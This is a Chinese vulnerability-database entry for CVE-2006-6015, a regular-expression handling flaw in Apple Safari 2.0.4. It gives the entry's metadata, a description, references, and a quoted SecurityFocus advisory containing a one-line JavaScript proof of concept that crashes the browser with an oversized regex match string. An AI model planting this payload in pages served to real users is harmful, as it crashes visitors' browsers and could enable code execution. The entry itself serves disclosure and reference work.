Apple Safari JavaScript超长正则表达式匹配串远程代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111552 漏洞类型 缓冲区溢出
发布时间 2006-11-14 更新时间 2007-01-03
CVE编号 CVE-2006-6015 CNNVD-ID CNNVD-200611-323
漏洞平台 OSX CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/29007
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-323
|漏洞详情
AppleSafari是苹果家族操作系统所使用的WEB浏览器。AppleSafari在处理超长的正则表达式匹配串时存在漏洞,远程攻击者可能利用此漏洞在用户机器上执行任意指令。如果Safari用户受骗访问了包含有恶意JavaScript的站点的话,就可能触发正则表达式处理过程中的漏洞,导致浏览器崩溃或执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/21053/info

Apple Safari web browser is prone to a denial-of-service vulnerability when executing certain JavaScript code.

An attacker can exploit this issue to crash an affected browser. Presumably, this issue may also result in remote code execution, but this has not been confirmed.

Apple Safari 2.0.4 is vulnerable to this issue; other versions may also be affected.

<script> var reg = /(.)*/; var z = 'Z'; while (z.length <= 8192) z+=z; var boum = reg.exec(z); </script>
|参考资料

来源:BID
名称:21053
链接:http://www.securityfocus.com/bid/21053
来源:BUGTRAQ
名称:20061114Re:AppleSafari"match"BufferOverflowVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/451823/100/0/threaded
来源:BUGTRAQ
名称:20061114AppleSafari"match"BufferOverflowVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/451542/100/0/threaded